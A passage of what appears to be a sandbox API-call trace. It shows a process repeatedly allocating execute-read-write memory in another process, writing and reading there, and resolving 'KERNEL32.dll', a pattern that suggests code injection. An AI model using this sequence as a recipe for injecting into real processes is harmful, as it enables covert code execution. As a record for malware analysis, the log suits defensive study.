RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.208] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4ce*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4ce*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0241.208] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.208] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.208] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.208] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.209] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.209] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.209] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.209] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.209] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.209] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.210] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.210] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.210] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3f0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.210] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.210] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4c0*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4c0*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.210] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.210] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.211] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.211] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.211] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.211] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.211] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.211] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.211] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.212] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.212] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.212] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.212] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.212] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.212] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4b0*, NumberOfBytesToWrite=0xe, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4b0*, NumberOfBytesWritten=0x28df88*=0xe) returned 0x0 [0241.212] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.213] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.213] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.213] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.213] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.213] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.213] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.214] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.214] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.214] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.214] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001e, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.214] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.214] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a400, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.214] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.214] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c4a6*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c4a6*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.215] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.215] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.215] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.215] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.215] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.215] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.215] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.216] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.216] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.216] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.216] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.216] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.216] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a408, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.216] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x21, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.217] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c49a*, NumberOfBytesToWrite=0x9, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c49a*, NumberOfBytesWritten=0x28df88*=0x9) returned 0x0 [0241.217] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.217] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.217] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.217] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.218] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.218] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.218] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.218] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.218] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.218] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.218] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20019, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.219] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.219] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a410, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.219] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.219] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c488*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c488*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.219] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.219] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.220] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.220] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.220] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.220] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.220] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.220] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.221] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.221] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.221] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.221] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.221] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a418, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.221] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.221] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c452*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c452*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.222] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.222] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.222] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.222] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.222] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.222] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.222] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.223] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.223] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.223] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.223] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.223] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.223] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a420, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.223] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c7ec, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="KERNEL32.dll") returned 13 [0241.223] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.224] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x19) returned 0x0 [0241.224] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.224] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.224] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.224] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.225] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.225] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.225] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.225] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.225] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.225] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.225] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20029, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.225] 